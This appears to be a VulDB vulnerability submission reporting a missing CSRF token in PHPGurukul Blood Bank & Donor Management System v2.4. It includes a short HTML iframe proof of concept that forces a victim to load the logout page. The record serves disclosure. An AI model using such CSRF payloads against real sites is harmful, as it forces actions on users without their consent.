| Title | https://phpgurukul.com/ Blood Bank & Donor Management System v2.4 CSRF Improper Input Validation |
|---|
| Description | There is no CSRF Token allowing attacker to generate any activities including logout. . Attacker can embed a iframe that has the logout url and send it to the victim. If
the victim clicks on the link, he will automatically get logged out.
<html>
<body>
<iframe
src="http://localhost/bbdms/logout.php"
style="border:0px #FFFFFF none;"
name="myLogoutFrame"
scrolling="no"
frameborder="1"
marginheight="0px"
marginwidth="0px"
height="400px"
width="600px"
allowfullscreen>
</iframe>
</body>
</html>
|
|---|
| User | Lo1x (UID 79468) |
|---|
| Submission | 12/25/2024 16:23 (1 Year ago) |
|---|
| Moderation | 12/25/2024 19:24 (3 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 289318 [PHPGurukul Blood Bank & Donor Management System 2.4 /logout.php cross-site request forgery] |
|---|
| Points | 17 |
|---|